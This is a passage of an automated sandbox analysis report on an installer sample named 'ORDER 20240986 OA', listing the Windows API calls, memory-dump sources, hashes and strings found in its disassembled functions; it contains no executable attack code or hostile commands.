                                                                                                                                                  • Associated: 00000000.00000002.2336658892.000000006FBB5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6fbb0000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                  • String ID: @Hmu
                                                                                                                                                  • API String ID: 4216380887-887474944
                                                                                                                                                  • Opcode ID: 372af87ff041e158adb792247b14b9f165e184524a646859db8024a04704df29
                                                                                                                                                  • Instruction ID: 175b9a2b1445cf1b112cabdf2e419c497157feb9bd8e0f56aa31e3a3b0f98d83
                                                                                                                                                  • Opcode Fuzzy Hash: 372af87ff041e158adb792247b14b9f165e184524a646859db8024a04704df29
                                                                                                                                                  • Instruction Fuzzy Hash: 8541AEB0008785EFD7159F25E844ABA77B8FB45324B004A5EE646C7980EF30A996CB61
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenW.KERNEL32(007A0F00,00000000,007924D8,74DF23A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                                                                                  • lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,74DF23A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                                                                                  • lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,74DF23A0), ref: 0040535A
                                                                                                                                                  • SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2531174081-0
                                                                                                                                                  • Opcode ID: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                                                                                                  • Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
                                                                                                                                                  • Opcode Fuzzy Hash: d3653f13458b7317840ca79dc32cb7632281d068d931c5ba13ed513af890554b
                                                                                                                                                  • Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
                                                                                                                                                  • GetMessagePos.USER32 ref: 00404BEC
                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404C06
                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
                                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                                  • String ID: f
                                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                  • Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
                                                                                                                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                  • Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4
                                                                                                                                                  APIs
                                                                                                                                                  • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                  • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                  • String ID: Tahoma
                                                                                                                                                  • API String ID: 3808545654-3580928618
                                                                                                                                                  • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                                                                                                  • Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
                                                                                                                                                  • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                                                                                                  • Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                                                                                                  APIs
                                                                                                                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                                                                                                  • MulDiv.KERNEL32(00088D7C,00000064,00088D80), ref: 00402E3C
                                                                                                                                                  • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                                  Strings
                                                                                                                                                  • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                                  • Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                                                                                  • Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
                                                                                                                                                  • Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                                                                                  • Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 6FBB121B: GlobalAlloc.KERNELBASE(00000040,?,6FBB123B,?,6FBB12DF,00000019,6FBB11BE,-000000A0), ref: 6FBB1225
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6FBB265B
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBB2690
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2336495745.000000006FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FBB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2336461963.000000006FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336529386.000000006FBB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336658892.000000006FBB5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6fbb0000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$Free$Alloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1780285237-0
                                                                                                                                                  • Opcode ID: 3e0c5f35cacea26655a51b64940fd95e2634b414f3b910c5fa07c17472f75df6
                                                                                                                                                  • Instruction ID: 99e096214810d56b52c3697333d219afb0fb862d049b8abbaa1f5ef4d79127bc
                                                                                                                                                  • Opcode Fuzzy Hash: 3e0c5f35cacea26655a51b64940fd95e2634b414f3b910c5fa07c17472f75df6
                                                                                                                                                  • Instruction Fuzzy Hash: E831DE31508581EFCB168F68ED99D7ABBB6FF8B314754462DF14287260DF30A8268B25
                                                                                                                                                  APIs
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2667972263-0
                                                                                                                                                  • Opcode ID: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                                                                                                                                  • Instruction ID: 9b62f472eb3a95df078ad497759be9c31f6c15c11f60cf08f6005a6c9cb4e6e4
                                                                                                                                                  • Opcode Fuzzy Hash: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                                                                                                                                  • Instruction Fuzzy Hash: 9921BFB1C00128BBCF116FA5DE49D9E7E79EF09364F14423AF960762E0CB794C419B98
                                                                                                                                                  APIs
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsx1318.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx1318.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsx1318.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsx1318.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsx1318.tmp$C:\Users\user\AppData\Local\Temp\nsx1318.tmp\System.dll
                                                                                                                                                  • API String ID: 3109718747-3961821495
                                                                                                                                                  • Opcode ID: 2806917471d26587652065b68c97e9d93b9fed1128aa7c726bb62807fa0de6fb
                                                                                                                                                  • Instruction ID: 4bb1670e371a3de23f361dcee459543bcfcf4636ee0f51b5b5a9e7d0ab821041
                                                                                                                                                  • Opcode Fuzzy Hash: 2806917471d26587652065b68c97e9d93b9fed1128aa7c726bb62807fa0de6fb
                                                                                                                                                  • Instruction Fuzzy Hash: DB11CB72A05300BEDB046FB18E8999F7664AF54399F20843FF502F61D1D9FC89415B5E
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2336495745.000000006FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FBB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2336461963.000000006FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336529386.000000006FBB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336658892.000000006FBB5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6fbb0000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeGlobal
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2979337801-0
                                                                                                                                                  • Opcode ID: fe541b48bfa4f5bd6e21677dcf120d721c8f77b3b7c9edcd98a619b49bc41908
                                                                                                                                                  • Instruction ID: 5bc012d81d97220c0fe9df3a7aac87b126cf67ff0d6b1f826b38694beda9e9be
                                                                                                                                                  • Opcode Fuzzy Hash: fe541b48bfa4f5bd6e21677dcf120d721c8f77b3b7c9edcd98a619b49bc41908
                                                                                                                                                  • Instruction Fuzzy Hash: A851A731D041DA9A8B119FB8F5845FEBBB5EF46354B1C826FD420E7140DF71BA828791
                                                                                                                                                  APIs
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FBB21F0,?,00000808), ref: 6FBB1639
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FBB21F0,?,00000808), ref: 6FBB1640
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FBB21F0,?,00000808), ref: 6FBB1654
                                                                                                                                                  • GetProcAddress.KERNEL32(6FBB21F0,00000000), ref: 6FBB165B
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FBB1664
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2336495745.000000006FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FBB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2336461963.000000006FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336529386.000000006FBB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336658892.000000006FBB5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6fbb0000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1148316912-0
                                                                                                                                                  • Opcode ID: c37da9dcac357709770d5bb27e76babb82a97cb55e2bb64b0ca3af549fac369e
                                                                                                                                                  • Instruction ID: 407a23b37e66808ea6a5665cb97c582c27f3a4e84e933dd497294086d23af75f
                                                                                                                                                  • Opcode Fuzzy Hash: c37da9dcac357709770d5bb27e76babb82a97cb55e2bb64b0ca3af549fac369e
                                                                                                                                                  • Instruction Fuzzy Hash: 0DF030722065387FDA2116A78C4DD9BBE9CDF8B2F5B150311F728D2190CA619C12DBF1
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                  • Opcode ID: 9f3e8361c5455c25eedd40ad678b741ea6618978e593034b97affd3e1747e9e4
                                                                                                                                                  • Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
                                                                                                                                                  • Opcode Fuzzy Hash: 9f3e8361c5455c25eedd40ad678b741ea6618978e593034b97affd3e1747e9e4
                                                                                                                                                  • Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38
                                                                                                                                                  APIs
